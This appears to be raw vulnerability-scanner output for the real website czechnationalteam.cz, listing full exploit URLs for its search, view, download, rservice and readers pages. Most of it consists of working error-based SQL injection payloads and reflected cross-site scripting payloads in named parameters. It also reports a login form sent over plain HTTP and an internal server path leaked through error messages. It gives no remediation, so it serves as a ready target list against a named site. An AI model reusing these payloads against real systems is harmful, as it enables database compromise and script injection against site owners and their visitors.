czechnationalteam.cz

1. SQL Injection
2.  
3. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
4.  
5. http://www.czechnationalteam.cz/search.php?rstext=all-phpRS-all&rstema=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
6. http://www.czechnationalteam.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
7. http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
8.  
9. |||
10.  
11. [High Possibility] SQL Injection
12.  
13. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
14.  
15. http://www.czechnationalteam.cz/search.php?rstext=all-phpRS-all&rstema=%27
16. http://www.czechnationalteam.cz/?strana=%27
17. http://www.czechnationalteam.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=%27
18. http://www.czechnationalteam.cz/search.php?rskolik=%27&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
19. http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=%27&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
20. http://www.czechnationalteam.cz/index.php?strana=%27
21. http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
22.  
23. http://www.czechnationalteam.cz/search.php
24. Parameter Name: rskde
25. Parameter Type: Post
26. Attack Pattern: (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
27.  
28. http://www.czechnationalteam.cz/search.php
29. Parameter Name: rstema
30. Parameter Type: Post
31. Attack Pattern: %27
32.  
33. |||
34.  
35. Cross-site Scripting
36.  
37. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
38.  
39. http://www.czechnationalteam.cz/search.php?rstext=all-phpRS-all&rstema='"--></style></script><script>alert(0x0001A9)</script>
40. http://www.czechnationalteam.cz/view.php?cisloclanku='"--></style></script><script>alert(0x0001F0)</script>
41. http://www.czechnationalteam.cz/view.php?nazevclanku=predstavujeme-distribuovane-vypocty-dc&cisloclanku='"--></style></script><script>alert(0x0001FC)</script>
42. http://www.czechnationalteam.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema='"--></style></script><script>alert(0x00022C)</script>
43. http://www.czechnationalteam.cz/rservice.php?akce=info&cisloclanku='"--></style></script><script>alert(0x000292)</script>
44.  
45. http://www.czechnationalteam.cz/search.php
46. Parameter Name: rstext
47. Parameter Type: Post
48. Attack Pattern: '"--></style></script><script>alert(0x0002BE)</script>
49.  
50. http://www.czechnationalteam.cz/rservice.php?akce=info&cisloclanku='"--></style></script><script>alert(0x000292)</script>
51.  
52. Vulnerable URL : http://www.czechnationalteam.cz/search.php
53. Parameter Name: rstext
54. Parameter Type: Post
55. Attack Pattern: '"--></style></script><script>alert(0x0002BE)</script>
56.  
57. http://www.czechnationalteam.cz/download.php?sekce=6'"--></style></script><script>alert(0x0002C5)</script>
58. http://www.czechnationalteam.cz/download.php?akce=detail&id_detail=80&sekce='"--></style></script><script>alert(0x0002ED)</script>
59.  
60. http://www.czechnationalteam.cz/view.php
61. Parameter Name: cisloclanku
62. Parameter Type: Post
63. Attack Pattern: <script>ns(0x00032C)</script>
64.  
65. http://www.czechnationalteam.cz/search.php
66. Parameter Name: rsrazeni
67. Parameter Type: Post
68. Attack Pattern: "><script>alert(9)</script>
69.  
70. http://www.czechnationalteam.cz/search.php
71. Parameter Name: rstema
72. Parameter Type: Post
73. Attack Pattern: '"--></style></script><script>alert(0x00033C)</script>
74.  
75. http://www.czechnationalteam.cz/rservice.php
76. Parameter Name: cisloclanku
77. Parameter Type: Post
78. Attack Pattern: '"--></style></script><script>alert(0x00034E)</script>
79.  
80. http://www.czechnationalteam.cz/search.php?rskolik='"--></style></script><script>alert(0x000355)</script>&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
81. Parameter Name: rskolik
82. Parameter Type: Querystring
83. Attack Pattern: '"--></style></script><script>alert(0x000355)</script>
84.  
85. http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext='"--></style></script><script>alert(0x00037B)</script>&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
86. http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema='"--></style></script><script>alert(0x00039E)</script>&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
87. http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde='"--></style></script><script>alert(0x0003A1)</script>&rsvelikost=sab&rsrazeni=datum_90
88. http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab'"--></style></script><script>alert(0x0003B4)</script>&rsrazeni=datum_90
89. http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab&rsrazeni='"--></style></script><script>alert(0x0003B5)</script>
90.  
91. http://www.czechnationalteam.cz/readers.php
92. Parameter Name: rjmeno
93. Parameter Type: Post
94. Attack Pattern: '"--></style></script><script>alert(0x0003F8)</script>
95.  
96. |||
97.  
98. Password Transmitted Over HTTP
99.  
100. Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
101. Vulnerable URL : http://www.czechnationalteam.cz/readers.php?akce=new
102. Form target action: readers.php
103.  
104. |||
105.  
106. [Possible] Internal Path Leakage (*nix)
107.  
108. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
109.  
110. http://www.czechnationalteam.cz/?strana=%27
111. Identified Internal Path(s): /var/www/web5/czechnationalteam.cz/czechnationalteam.cz/db/phprs_sql_to_mysql.php
112. Parameter Name: strana
113. Parameter Type: Querystring
114. Attack Pattern: %27
115.  
116. http://www.czechnationalteam.cz/search.php?rskolik=%27&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
117. Identified Internal Path(s): /var/www/web5/czechnationalteam.cz/czechnationalteam.cz/db/phprs_sql_to_mysql.php
118. Parameter Name: rskolik
119. Parameter Type: Querystring
120. Attack Pattern: %27
121.  
122. http://www.czechnationalteam.cz/index.php?strana=%27
123. Identified Internal Path(s): /var/www/web5/czechnationalteam.cz/czechnationalteam.cz/db/phprs_sql_to_mysql.php
124. Parameter Name: strana
125. Parameter Type: Querystring
126. Attack Pattern: %27